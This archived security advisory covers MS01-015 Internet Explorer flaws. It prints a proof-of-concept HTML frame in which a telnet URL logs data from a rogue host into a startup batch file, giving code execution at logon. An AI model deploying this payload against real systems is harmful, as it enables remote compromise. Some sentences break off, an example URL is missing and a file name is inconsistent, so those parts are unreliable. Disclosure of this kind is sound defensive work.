

    IE and Windows Scripting Host


    Following is  based on  a   Microsoft Security  Bulletin MS01-015.
    The IE security architecture provides a caching mechanism that  is
    used to store  content that needs  to be downloaded  and processed
    on the  user's local  machine.   The purpose  of the  cache is  to
    obfuscate the physical  location of the  cached content, in  order
    to ensure that the web page  or HTML e-mail will work through  the
    IE security architecture to access the information.  This  ensures
    that the uses of the information can be properly restricted.

    A vulnerability exists  because it is  possible for a  web page or
    HTML  e-mail  to  learn  the  physical location of cached content.
    Armed with this  information, an attacker  could cause the  cached
    content  to  be  opened  in  the  Local Computer Zone.  This would
    enable him to launch compiled HTML help (.CHM) files that  contain
    shortcuts  to  executables,  thereby  enabling  him  to  run   the

    In  addition  to  eliminating  this  vulnerability,  the   patches
    provided below eliminate three  other vulnerabilities that  either
    pose significantly less  risk or could  only be exploited  in very
    restricted situations:
    - A  variant  of  the  "Frame  Domain Verification"  vulnerability
      discussed in  Microsoft Security  Bulletins MS00-033,  MS00-055,
      and MS00-093.   The vulnerability could  enable a malicious  web
      site operator to open two browser windows, one in the web site's
      domain and  the other  on the  user's local  file system, and to
      pass information  from the  latter to  the former.   This  could
      enable the web site operator  to read, but not change,  any file
      on the user's local computer  that could be opened in  a browser
    - A vulnerability that is identical in effect to the "Frame Domain
      Verification" vulnerability, but  which actually results  from a
      flaw in Windows Scripting Host rather than IE.  Because it could
      only be exploited via IE, we have provided the patch here.
    - A vulnerability that affects how Telnet sessions are invoked via
      IE.   By  design,  telnet  sessions  can  be  launched  via  IE.
      However, a vulnerability exists  because when doing so,  IE will
      start  Telnet  using  any  command-line  options  the  web  site
      specifies.  This only becomes  a concern when using the  version
      of the Telnet client that installs as part of Services for  Unix
      (SFU) 2.0 on Windows NT(r) 4.0 or Windows(r) 2000 machines.  The
      version of the Telnet client  in SFU 2.0 provides an  option for
      creating a verbatim transcript of a Telnet session.  An attacker
      could start a session using  the logging option, then stream  an
      executable file onto the user's system in a location that  would
      cause it  to be  executed automatically  the next  time the user
      booted the machine.  The flaw does not lie in the Telnet client,
      but in IE, which should not allow Telnet to be started  remotely
      with command-line arguments.

    None of the vulnerabilities  could be exploited without  some user
    action - either browsing to the attacker's site or opening a  mail
    from him.   Customers who exercise  safe browsing habits  would be
    less likely visit untrustworthy sites, and customers who have used
    the Security Zones feature to restrict what HTML mail can do would
    be less likely to be affected by this vulnerability.

    The  variants  of  the  "frame  domain verification" vulnerability
    discussed above could  only be used  to view files,  and only file
    types that can be opened in a browser window.

    The vulnerability  affecting Telnet  invocation is  only a concern
    for  customers  who  are  using  the  Telnet  client that ships as
    part of  Services for  Unix 2.0.  Other versions  of Telnet do not
    include the command-line feature to create log files.

    This  vulnerability  occurs  as  a  result  of  Internet  Explorer
    executing  the   "telnet"  command   and  passing   command   line
    parameters, specified  in the  URL, to  the telnet  program.   The
    Windows 2000 Telnet client contains a client side logging  option,
    which is used to log all  telnet session data to a file  specified
    by  this  option.   By  specifying  the  "-f"  flag  to the telnet
    command, accompanied by a filename, all session text is logged  to
    this file.

    This vulnerability was discovered by Oliver Friedrichs.

    This vulnerability can be reproduced by giving Internet Explorer a
    URL such as the following:


    The  above  example  will  cause  Internet  Explorer to invoke the
    telnet client and cause it to connect to the host "host",  logging
    all  output  to  the  file  "\file.txt".   An  attacker  can cause
    arbitrary data to be  written to this file  by setting up a  rogue
    server, such  as netcat,  which is  listening on  the telnet port,
    sending their desired data to the client.  Arbitrary port  numbers
    can also be  specified on the  telnet command line,  so the server
    need not listen on port 23.

    Furthermore, the  invocation of  the telnet  client can  be hidden
    within   existing   HTML,   automating   it's   execution.    This
    vulnerability can also be exploited via Outlook, which by  default
    will automatically process HTML messages.

        <frameset rows="100%,*">
        <frame src=about:blank>
        <frame src=telnet:-f%20\Documents%20and%Settings\All%20Users\start%20menu\programs\startup\start.bat%20host%208000>

    The above example will cause data that is received from port  8000
    on the host  "host" to be  written to the  file "boom.bat" in  the
    startup directory for all users.  Assuming the logged in user  has
    the appropriate permissions, this will create a batch file that is
    executed upon any future user logon.  Note that if the username is
    known  to  the  attacker,  this  can  also be directed towards the
    logged in user, who will have permission to create this file.


    A patch is available to  fix this vulnerability.  Please  read the
    Security Bulletin

    for information on obtaining this patch.

    The patches  for Windows  Scripting Host  referenced in  Microsoft
    Security  Bulletin  MS01-015  are  not  clearly  identified on the
    pages referenced in the bulletin

    These pages contain  only downloads for  the complete WSH  5.1 and
    5.5,  respectively,  with  no  mention  of updates for the problem
    described in the security bulletin.  The pages says that they were
    last updated 12/15/2000 (months  before the security bulletin  was
    issued).  Microsoft Security Response Center verified that the WSH
    pages referenced in the security bulletin and above do contain the
    update for  the problem  described in  the security  bulletin even
    though  the  pages  have  no  reference  to this update.  Tests of
    installing the WSH 5.5  Win9xNT version shows that  the downloaded
    version is indeed